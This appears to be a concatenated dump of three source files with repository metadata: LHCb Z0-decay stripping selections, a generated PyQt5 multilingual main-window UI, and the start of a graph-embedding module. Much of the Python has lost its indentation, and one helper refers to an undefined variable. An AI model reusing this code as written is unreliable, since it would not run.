        Z2Pi0GammaLine = StrippingLine(name + 'Z2Pi0GammaLine',
                                       prescale=config['Z2Pi0GammaPreScale'],
                                       postscale=config['Z2Pi0GammaPostScale'],
                                       #RequiredRawEvents = config['RawEvents'],
                                       RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                       selection=selZ2Pi0Gamma)
        self.registerLine(Z2Pi0GammaLine)
        # Z-> pi0 pi0 line
        Z2Pi0Pi0Line = StrippingLine(name + 'Z2Pi0Pi0Line',
                                     prescale=config['Z2Pi0Pi0PreScale'],
                                     postscale=config['Z2Pi0Pi0PostScale'],
                                     #RequiredRawEvents = config['RawEvents'],
                                     RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                     selection=selZ2Pi0Pi0)
        self.registerLine(Z2Pi0Pi0Line)
        # Z-> rho gamma line
        Z2RhoGammaLine = StrippingLine(name + 'Z2RhoGammaLine',
                                       prescale=config['Z2RhoGammaPreScale'],
                                       postscale=config['Z2RhoGammaPostScale'],
                                       #RequiredRawEvents = config['RawEvents'],
                                       RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                       selection=selZ2RhoGamma)
        self.registerLine(Z2RhoGammaLine)
        # Z-> omega gamma line
        Z2OmegaGammaLine = StrippingLine(name + 'Z2OmegaGammaLine',
                                         prescale=config['Z2OmegaGammaPreScale'],
                                         postscale=config['Z2OmegaGammaPostScale'],
                                         #RequiredRawEvents = config['RawEvents'],
                                         RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                         selection=selZ2OmegaGamma)
        self.registerLine(Z2OmegaGammaLine)
        # Z-> K* gamma line
        Z2KstGammaLine = StrippingLine(name + 'Z2KstGammaLine',
                                       prescale=config['Z2KstGammaPreScale'],
                                       postscale=config['Z2KstGammaPostScale'],
                                       #RequiredRawEvents = config['RawEvents'],
                                       RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                       selection=selZ2KstGamma)
        self.registerLine(Z2KstGammaLine)
        # Z-> phi gamma line
        Z2PhiGammaLine = StrippingLine(name + 'Z2PhiGammaLine',
                                       prescale=config['Z2PhiGammaPreScale'],
                                       postscale=config['Z2PhiGammaPostScale'],
                                       #RequiredRawEvents = config['RawEvents'],
                                       RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                       selection=selZ2PhiGamma)
        self.registerLine(Z2PhiGammaLine)
        # Z-> D0 gamma line
        Z2D0GammaLine = StrippingLine(name + 'Z2D0GammaLine',
                                      prescale=config['Z2D0GammaPreScale'],
                                      postscale=config['Z2D0GammaPostScale'],
                                      #RequiredRawEvents = config['RawEvents'],
                                      RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                      selection=selZ2D0Gamma)
        self.registerLine(Z2D0GammaLine)
        # Z-> J/psi, Upsilon gamma line
        Z2QONGammaLine = StrippingLine(name + 'Z2QONGammaLine',
                                       prescale=config['Z2QONGammaPreScale'],
                                       postscale=config['Z2QONGammaPostScale'],
                                       #RequiredRawEvents = config['RawEvents'],
                                       RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                       selection=selZ2QONGamma)
        self.registerLine(Z2QONGammaLine)
#################################################################################
def makePhoton(name, photonPT):
    """Select photons from 'Phys/StdLooseAllPhotons' above a PT threshold.
    @arg name: name of the Selection.
    @arg photonPT: minimum transverse momentum of the photon
    @return: Selection object
    """
    ptFilter = FilterDesktop(Code="(PT> %(photonPT)s)" % locals())
    return Selection(name, Algorithm=ptFilter, RequiredSelections=[StdLooseAllPhotons])
def makePion0(name, pion0PT):
    """Build a merged pi0 Selection from the resolved and merged standard pi0 lists.
    @arg name: name of the Selection.
    @arg pion0PT: minimum transverse momentum of the pi0
    @return: MergedSelection object
    """
    from StandardParticles import StdLooseResolvedPi0 as _pi0resolved
    from StandardParticles import StdLooseMergedPi0 as _pi0merged
    # Identical PT requirement applied to both pi0 reconstruction categories.
    ptCut = "(PT > %(pion0PT)s)" % locals()
    selpi0resolved = Selection("Selection_"+name+"_pi0resolved", RequiredSelections=[_pi0resolved], Algorithm=FilterDesktop(Code=ptCut))
    selpi0merged = Selection("Selection_"+name+"_pi0merged", RequiredSelections=[_pi0merged], Algorithm=FilterDesktop(Code=ptCut))
    return MergedSelection(name, RequiredSelections=[selpi0resolved, selpi0merged])
def makeRho(name, TrChi2, MesonPT, RhoMassWin):
    """Filter rho(770)0 -> pi+ pi- candidates from 'Phys/StdLooseRho0'.
    @arg name: name of the Selection.
    @arg TrChi2: maximum track chi2/dof of the pions
    @arg MesonPT: minimum PT of the rho candidate
    @arg RhoMassWin: rho(770)0 mass window
    @return: Selection object
    """
    stdRho = DataOnDemand(Location="Phys/StdLooseRho0/Particles")
    defs = [
        "goodTrack = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
        "goodRho = ((ADMASS('rho(770)0') < %(RhoMassWin)s) & (PT > %(MesonPT)s))" % locals(),
    ]
    rhoFilter = FilterDesktop(Preambulo=defs, Code="goodRho & CHILDCUT( goodTrack , 1 ) & CHILDCUT( goodTrack , 2 )")
    return Selection(name, Algorithm=rhoFilter, RequiredSelections=[stdRho])
def makeOmega(name, MesonPT, OmegaMassWin, selPion0):
    """Combine omega(782) -> pi+ pi- pi0 from standard pions and the pi0 selection.
    @arg name: name of the Selection.
    @arg MesonPT: minimum PT of the omega candidate
    @arg OmegaMassWin: omega(782) mass window
    @arg selPion0: selected pion0 candidates
    @return: Selection object
    """
    loosePions = DataOnDemand(Location="Phys/StdLoosePions/Particles")
    combiner = CombineParticles()
    combiner.DecayDescriptor = "omega(782) -> pi+ pi- pi0"
    combiner.CombinationCut = "(ADAMASS('omega(782)') < %(OmegaMassWin)s )" % locals()
    combiner.MotherCut = "((ADMASS('omega(782)') < %(OmegaMassWin)s ) & (PT > %(MesonPT)s))" % locals()
    return Selection(name, Algorithm=combiner.configurable("Combine_"+name+"_PiPiPi0"), RequiredSelections=[loosePions, selPion0])
def makeKstar(name, TrChi2, MesonPT, KstMassWin):
    """Filter K*(892)0 -> K pi candidates from 'Phys/StdVeryLooseDetachedKst2Kpi'.
    @arg name: name of the Selection.
    @arg TrChi2: maximum track chi2/dof of the daughters
    @arg MesonPT: minimum PT of the K* candidate
    @arg KstMassWin: K* mass window
    @return: Selection object
    """
    stdKst = DataOnDemand(Location="Phys/StdVeryLooseDetachedKst2Kpi/Particles")
    defs = [
        "goodTrack = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
        "goodKstar = ((ADMASS('K*(892)0') < %(KstMassWin)s) & (PT > %(MesonPT)s))" % locals(),
    ]
    kstFilter = FilterDesktop(Preambulo=defs, Code="goodKstar & CHILDCUT( goodTrack , 1 ) & CHILDCUT( goodTrack , 2 )")
    return Selection(name, Algorithm=kstFilter, RequiredSelections=[stdKst])
def makePhi2KK(name, TrChi2, MesonPT, PhiMassWin):
    """Filter phi(1020) -> K+ K- candidates from 'Phys/StdLoosePhi2KK'.
    @arg name: name of the Selection.
    @arg TrChi2: maximum track chi2/dof of the kaons
    @arg MesonPT: minimum PT of the phi candidate
    @arg PhiMassWin: phi mass window
    @return: Selection object
    """
    stdPhi = DataOnDemand(Location="Phys/StdLoosePhi2KK/Particles")
    defs = [
        "goodKaon = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
        "goodPhi = ((ADMASS('phi(1020)') < %(PhiMassWin)s) & (PT > %(MesonPT)s))" % locals(),
    ]
    phiFilter = FilterDesktop(Preambulo=defs, Code='goodPhi & CHILDCUT( goodKaon, 1 ) & CHILDCUT( goodKaon, 2 )')
    return Selection(name, Algorithm=phiFilter, RequiredSelections=[stdPhi])
def makeD02KPi(name, TrChi2, MesonPT, D0MassWin):
    """Filter D0 -> K pi candidates from 'Phys/StdLooseD02KPi'.
    @arg name: name of the Selection.
    @arg TrChi2: maximum track chi2/dof of the daughters
    @arg MesonPT: minimum PT of the D0 candidate
    @arg D0MassWin: D0 mass window
    @return: Selection object
    """
    stdD0 = DataOnDemand(Location="Phys/StdLooseD02KPi/Particles")
    defs = [
        "goodKaon = ((TRCHI2DOF < %(TrChi2)s))" % locals(),
        "goodD0 = ((ADMASS('D0') < %(D0MassWin)s) & (PT > %(MesonPT)s))" % locals(),
    ]
    d0Filter = FilterDesktop(Preambulo=defs, Code='goodD0 & CHILDCUT( goodKaon, 1 ) & CHILDCUT( goodKaon, 2 )')
    return Selection(name, Algorithm=d0Filter, RequiredSelections=[stdD0])
def makeQON(name, VtxChi2, TrChi2, MesonPT, MuonPT, MuonP, JpsiMassMin, JpsiMassMax, UpsilonMassMin):
    """Filter quarkonium (J/psi or Upsilon) -> mu mu candidates from 'Phys/StdLooseDiMuon'.
    @arg name: name of the Selection.
    @arg VtxChi2: maximum vertex chi2/dof
    @arg TrChi2: maximum muon track chi2/dof
    @arg MesonPT: minimum PT of the dimuon candidate
    @arg MuonPT: minimum muon PT
    @arg MuonP: minimum muon P
    @arg JpsiMassMin: lower edge of the J/psi mass window
    @arg JpsiMassMax: upper edge of the J/psi mass window
    @arg UpsilonMassMin: lower edge of the Upsilon mass region
    @return: Selection object
    """
    stdDiMuon = DataOnDemand(Location="Phys/StdLooseDiMuon/Particles")
    # Per-muon quality cuts and the dimuon mass/vertex/PT requirement.
    muCut = "(MINTREE('mu+'==ABSID,PT) > %(MuonPT)s ) & (MINTREE('mu+'==ABSID,P) > %(MuonP)s ) & (MAXTREE('mu+'==ABSID,TRCHI2DOF) < %(TrChi2)s)" % locals()
    massCut = "(((MM > %(JpsiMassMin)s ) & (MM < %(JpsiMassMax)s )) | (MM > %(UpsilonMassMin)s )) & (VFASPF(VCHI2PDOF)< %(VtxChi2)s) & (PT > %(MesonPT)s )" % locals()
    diMuFilter = FilterDesktop(Code="&".join([muCut, massCut]))
    return Selection(name, Algorithm=diMuFilter, RequiredSelections=[stdDiMuon])
####################################################################################
def makeZ2GammaGamma(name, gammaSel, Pi0Pi0PT, ZMassWin):
    """Combine Z0 -> gamma gamma from the photon selection.
    @arg name: name of the Selection.
    @arg gammaSel: photon selection
    @arg Pi0Pi0PT: minimum photon PT
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> gamma gamma",
        DaughtersCuts={'gamma': "PT > %(Pi0Pi0PT)s" % locals()},
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        # Neutral-only combination: use the momentum combiner, no vertex fit.
        ParticleCombiners={"": "MomentumCombiner:PUBLIC"},
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel])
def makeZ2Pi0Gamma(name, Pion0Sel, gammaSel, Pi0Pi0PT, ZMassWin):
    """Combine Z0 -> pi0 gamma from the pi0 and photon selections.
    @arg name: name of the Selection.
    @arg Pion0Sel: pi0 selection
    @arg gammaSel: photon selection
    @arg Pi0Pi0PT: minimum PT of the pi0 and the photon
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    dauCut = "PT > %(Pi0Pi0PT)s" % locals()
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> pi0 gamma",
        DaughtersCuts={'pi0': dauCut, 'gamma': dauCut},
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        # Neutral-only combination: use the momentum combiner, no vertex fit.
        ParticleCombiners={"": "MomentumCombiner:PUBLIC"},
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, Pion0Sel])
def makeZ2Pi0Pi0(name, Pion0Sel, Pi0Pi0PT, ZMassWin):
    """Combine Z0 -> pi0 pi0 from the pi0 selection.
    @arg name: name of the Selection.
    @arg Pion0Sel: pi0 selection
    @arg Pi0Pi0PT: minimum pi0 PT
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> pi0 pi0",
        DaughtersCuts={'pi0': "PT > %(Pi0Pi0PT)s" % locals()},
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        # Neutral-only combination: use the momentum combiner, no vertex fit.
        ParticleCombiners={"": "MomentumCombiner:PUBLIC"},
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[Pion0Sel])
def makeZ2RhoGamma(name, RhoSel, gammaSel, ZMassWin):
    """Combine Z0 -> rho(770)0 gamma from the rho and photon selections.
    @arg name: name of the Selection.
    @arg RhoSel: rho -> pi+ pi- selection
    @arg gammaSel: photon selection
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> rho(770)0 gamma",
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, RhoSel])
def makeZ2OmegaGamma(name, OmegaSel, gammaSel, ZMassWin):
    """Combine Z0 -> omega(782) gamma from the omega and photon selections.
    @arg name: name of the Selection.
    @arg OmegaSel: omega -> pi+ pi- pi0 selection
    @arg gammaSel: photon selection
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> omega(782) gamma",
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, OmegaSel])
def makeZ2KstGamma(name, KstSel, gammaSel, ZMassWin):
    """Combine Z0 -> K*(892)0 gamma (plus charge conjugate) from the K* and photon selections.
    @arg name: name of the Selection.
    @arg KstSel: K* -> K+ pi- selection
    @arg gammaSel: photon selection
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="[Z0 -> K*(892)0 gamma]cc",
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, KstSel])
def makeZ2PhiGamma(name, phiSel, gammaSel, ZMassWin):
    """Combine Z0 -> phi(1020) gamma from the phi and photon selections.
    @arg name: name of the Selection.
    @arg phiSel: phi -> K+ K- selection
    @arg gammaSel: photon selection
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> phi(1020) gamma",
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, phiSel])
def makeZ2D0Gamma(name, D0Sel, gammaSel, ZMassWin):
    """Combine Z0 -> D0 gamma from the D0 and photon selections.
    @arg name: name of the Selection.
    @arg D0Sel: D0 -> K pi selection
    @arg gammaSel: photon selection
    @arg ZMassWin: Z0 mass window
    @return: Selection object
    """
    combiner = CombineParticles(
        DecayDescriptor="Z0 -> D0 gamma",
        MotherCut="(ADMASS('Z0') < %(ZMassWin)s)" % locals(),
        ReFitPVs=False,
    )
    return Selection(name, Algorithm=combiner, RequiredSelections=[gammaSel, D0Sel])
def makeZ2QONGamma(name, QONSel, gammaSel, ZMassWin):
"""
Create and return a Z -> Jpsi/Upsilon Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg QONSel: Jpsi/Upsilon -> mu mu selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> J/psi(1S) gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, QONSel])
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
04df4861383b7581afd8d54a6fdc8875fe88450c | a170461845f5b240daf2090810b4be706191f837 | /pyqt/DemoFullCode-PythonQt/chap11GUI_Aux/Demo11_1MultiLang/ui_MainWindow.py | 36735a91bc09f4f4433c4a9dc7ff1360ae644a22 | [] | no_license | longhuarst/QTDemo | ec3873f85434c61cd2a8af7e568570d62c2e6da8 | 34f87f4b2337a140122b7c38937ab4fcf5f10575 | refs/heads/master | 2022-04-25T10:59:54.434587 | 2020-04-26T16:55:29 | 2020-04-26T16:55:29 | 259,048,398 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,566 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainWindow.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(770, 471)
MainWindow.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.textEdit = QtWidgets.QPlainTextEdit(self.centralWidget)
self.textEdit.setGeometry(QtCore.QRect(55, 15, 626, 281))
font = QtGui.QFont()
font.setPointSize(12)
self.textEdit.setFont(font)
self.textEdit.setObjectName("textEdit")
MainWindow.setCentralWidget(self.centralWidget)
self.menuBar = QtWidgets.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 770, 23))
self.menuBar.setObjectName("menuBar")
self.menu_E = QtWidgets.QMenu(self.menuBar)
self.menu_E.setObjectName("menu_E")
self.menu_F = QtWidgets.QMenu(self.menuBar)
self.menu_F.setObjectName("menu_F")
self.menu = QtWidgets.QMenu(self.menu_F)
self.menu.setObjectName("menu")
self.menu_F_2 = QtWidgets.QMenu(self.menuBar)
self.menu_F_2.setObjectName("menu_F_2")
MainWindow.setMenuBar(self.menuBar)
self.mainToolBar = QtWidgets.QToolBar(MainWindow)
self.mainToolBar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.mainToolBar.setObjectName("mainToolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actEdit_Cut = QtWidgets.QAction(MainWindow)
self.actEdit_Cut.setEnabled(False)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/images/200.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Cut.setIcon(icon)
self.actEdit_Cut.setObjectName("actEdit_Cut")
self.actEdit_Copy = QtWidgets.QAction(MainWindow)
self.actEdit_Copy.setEnabled(False)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/icons/images/202.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Copy.setIcon(icon1)
self.actEdit_Copy.setObjectName("actEdit_Copy")
self.actEdit_Paste = QtWidgets.QAction(MainWindow)
self.actEdit_Paste.setEnabled(False)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/icons/images/204.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Paste.setIcon(icon2)
self.actEdit_Paste.setObjectName("actEdit_Paste")
self.actFont_Bold = QtWidgets.QAction(MainWindow)
self.actFont_Bold.setCheckable(True)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/icons/images/500.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_Bold.setIcon(icon3)
self.actFont_Bold.setObjectName("actFont_Bold")
self.actFont_Italic = QtWidgets.QAction(MainWindow)
self.actFont_Italic.setCheckable(True)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/icons/images/502.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_Italic.setIcon(icon4)
self.actFont_Italic.setObjectName("actFont_Italic")
self.actFont_UnderLine = QtWidgets.QAction(MainWindow)
self.actFont_UnderLine.setCheckable(True)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/icons/images/504.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_UnderLine.setIcon(icon5)
self.actFont_UnderLine.setObjectName("actFont_UnderLine")
self.actClose = QtWidgets.QAction(MainWindow)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap(":/icons/images/132.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actClose.setIcon(icon6)
self.actClose.setObjectName("actClose")
self.actSys_ToggleText = QtWidgets.QAction(MainWindow)
self.actSys_ToggleText.setCheckable(True)
self.actSys_ToggleText.setChecked(True)
self.actSys_ToggleText.setObjectName("actSys_ToggleText")
self.actEdit_SelectAll = QtWidgets.QAction(MainWindow)
self.actEdit_SelectAll.setObjectName("actEdit_SelectAll")
self.actFile_New = QtWidgets.QAction(MainWindow)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap(":/icons/images/100.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_New.setIcon(icon7)
self.actFile_New.setObjectName("actFile_New")
self.actFile_Open = QtWidgets.QAction(MainWindow)
icon8 = QtGui.QIcon()
icon8.addPixmap(QtGui.QPixmap(":/icons/images/122.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_Open.setIcon(icon8)
self.actFile_Open.setObjectName("actFile_Open")
self.actFile_Save = QtWidgets.QAction(MainWindow)
icon9 = QtGui.QIcon()
icon9.addPixmap(QtGui.QPixmap(":/icons/images/104.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_Save.setIcon(icon9)
self.actFile_Save.setObjectName("actFile_Save")
self.actLang_CN = QtWidgets.QAction(MainWindow)
self.actLang_CN.setCheckable(True)
self.actLang_CN.setChecked(True)
icon10 = QtGui.QIcon()
icon10.addPixmap(QtGui.QPixmap(":/icons/images/CN.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actLang_CN.setIcon(icon10)
self.actLang_CN.setObjectName("actLang_CN")
self.actLang_EN = QtWidgets.QAction(MainWindow)
self.actLang_EN.setCheckable(True)
self.actLang_EN.setChecked(False)
icon11 = QtGui.QIcon()
icon11.addPixmap(QtGui.QPixmap(":/icons/images/timg2.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actLang_EN.setIcon(icon11)
self.actLang_EN.setObjectName("actLang_EN")
self.menu_E.addAction(self.actEdit_Cut)
self.menu_E.addAction(self.actEdit_Copy)
self.menu_E.addAction(self.actEdit_Paste)
self.menu_E.addSeparator()
self.menu_E.addAction(self.actEdit_SelectAll)
self.menu.addAction(self.actLang_CN)
self.menu.addAction(self.actLang_EN)
self.menu_F.addAction(self.actFont_Bold)
self.menu_F.addAction(self.actFont_Italic)
self.menu_F.addAction(self.actFont_UnderLine)
self.menu_F.addSeparator()
self.menu_F.addAction(self.actSys_ToggleText)
self.menu_F.addAction(self.menu.menuAction())
self.menu_F_2.addAction(self.actFile_New)
self.menu_F_2.addAction(self.actFile_Open)
self.menu_F_2.addAction(self.actFile_Save)
self.menu_F_2.addSeparator()
self.menu_F_2.addAction(self.actClose)
self.menuBar.addAction(self.menu_F_2.menuAction())
self.menuBar.addAction(self.menu_E.menuAction())
self.menuBar.addAction(self.menu_F.menuAction())
self.mainToolBar.addAction(self.actFile_New)
self.mainToolBar.addAction(self.actFile_Open)
self.mainToolBar.addAction(self.actFile_Save)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actEdit_Cut)
self.mainToolBar.addAction(self.actEdit_Copy)
self.mainToolBar.addAction(self.actEdit_Paste)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actFont_Bold)
self.mainToolBar.addAction(self.actFont_Italic)
self.mainToolBar.addAction(self.actFont_UnderLine)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actLang_CN)
self.mainToolBar.addAction(self.actLang_EN)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actClose)
self.retranslateUi(MainWindow)
self.actEdit_Cut.triggered.connect(self.textEdit.cut)
self.actEdit_Copy.triggered.connect(self.textEdit.copy)
self.actEdit_Paste.triggered.connect(self.textEdit.paste)
self.actEdit_SelectAll.triggered.connect(self.textEdit.selectAll)
self.actClose.triggered.connect(MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Demo11_1,多语言界面"))
self.menu_E.setTitle(_translate("MainWindow", "编辑(&E)"))
self.menu_F.setTitle(_translate("MainWindow", "格式(&M)"))
self.menu.setTitle(_translate("MainWindow", "界面语言"))
self.menu_F_2.setTitle(_translate("MainWindow", "文件(&F)"))
self.actEdit_Cut.setText(_translate("MainWindow", "剪切"))
self.actEdit_Cut.setToolTip(_translate("MainWindow", "剪切到粘贴板"))
self.actEdit_Cut.setShortcut(_translate("MainWindow", "Ctrl+X"))
self.actEdit_Copy.setText(_translate("MainWindow", "复制"))
self.actEdit_Copy.setToolTip(_translate("MainWindow", "复制到粘贴板"))
self.actEdit_Copy.setShortcut(_translate("MainWindow", "Ctrl+C"))
self.actEdit_Paste.setText(_translate("MainWindow", "粘贴"))
self.actEdit_Paste.setToolTip(_translate("MainWindow", "从粘贴板粘贴"))
self.actEdit_Paste.setShortcut(_translate("MainWindow", "Ctrl+V"))
self.actFont_Bold.setText(_translate("MainWindow", "粗体"))
self.actFont_Bold.setToolTip(_translate("MainWindow", "粗体"))
self.actFont_Italic.setText(_translate("MainWindow", "斜体"))
self.actFont_Italic.setToolTip(_translate("MainWindow", "斜体"))
self.actFont_UnderLine.setText(_translate("MainWindow", "下划线"))
self.actFont_UnderLine.setToolTip(_translate("MainWindow", "下划线"))
self.actClose.setText(_translate("MainWindow", "关闭"))
self.actClose.setToolTip(_translate("MainWindow", "关闭本窗口"))
self.actSys_ToggleText.setText(_translate("MainWindow", "显示按钮文字"))
self.actSys_ToggleText.setToolTip(_translate("MainWindow", "显示工具栏按钮文字"))
self.actEdit_SelectAll.setText(_translate("MainWindow", "全选"))
self.actEdit_SelectAll.setToolTip(_translate("MainWindow", "全选"))
self.actEdit_SelectAll.setShortcut(_translate("MainWindow", "Ctrl+A"))
self.actFile_New.setText(_translate("MainWindow", "新建"))
self.actFile_New.setToolTip(_translate("MainWindow", "新建文件"))
self.actFile_New.setShortcut(_translate("MainWindow", "Ctrl+N"))
self.actFile_Open.setText(_translate("MainWindow", "打开..."))
self.actFile_Open.setToolTip(_translate("MainWindow", "打开文件"))
self.actFile_Open.setShortcut(_translate("MainWindow", "Ctrl+O"))
self.actFile_Save.setText(_translate("MainWindow", "保存"))
self.actFile_Save.setToolTip(_translate("MainWindow", "保存修改"))
self.actFile_Save.setShortcut(_translate("MainWindow", "Ctrl+S"))
self.actLang_CN.setText(_translate("MainWindow", "汉语"))
self.actLang_CN.setToolTip(_translate("MainWindow", "汉语界面"))
self.actLang_EN.setText(_translate("MainWindow", "English"))
self.actLang_EN.setToolTip(_translate("MainWindow", "English interface"))
import res_rc
| [
"841105197@qq.com"
] | 841105197@qq.com |
d88a0c782a8bc73f4d9a36576f31ecbb9dc9cec7 | d4f28073663e228e8bd119a70d17a8a21fc849c9 | /algorithms/libHIN/embeddings.py | f48db9584826b168d8bbb09aa8b5de536741ac5f | [] | no_license | wsgan001/embedding_graph | fe81fa6cd81265a1b371d5de0dc4889bf7572763 | 93b49015dd2610e4348b2f7e3dc90405bd803c36 | refs/heads/master | 2021-08-27T18:54:47.803771 | 2017-11-23T09:36:05 | 2017-11-23T09:36:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,559 | py | ## this is the embedding code
from .dataStructures import HeterogeneousInformationNetwork
from .core import stochastic_normalization, page_rank
from .infolog import emit_state
import numpy as np
import scipy.sparse as sp
from .community_detection import *
from .graphlet_calculation import count_graphlets_orca
from .deep_features import deep_embedding_gp
import networkx as nx
from collections import Counter
from .node2vec_interface import get_n2v_embedding
## compute communities
def return_communities(net):
G = nx.Graph()
rows,cols = net.nonzero()
for row,col in zip(rows,cols):
G.add_edge(row,col)
partitions = best_partition(G)
cnts = Counter(partitions.values())
sizes = {k:cnts[v] for k,v in partitions.items()}
return sizes
def return_clustering_coefficients(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
clusterings = nx.clustering(G)
return clusterings
def return_load_centralities(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
centralities = nx.load_centrality(G)
return centralities
def return_betweenness_centralities(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
centralities = nx.betweenness_centrality(G)
return centralities
## compute a page rank feature vector
def pr_kernel(index_row):
pr = page_rank(graph, [index_row], try_shrink=True)
norm = np.linalg.norm(pr, 2)
if norm > 0:
pr = pr / np.linalg.norm(pr, 2)
return (index_row,pr)
else:
return None
def hinmine_embedding_n2v(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,n2v_binary="./node2vec"):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
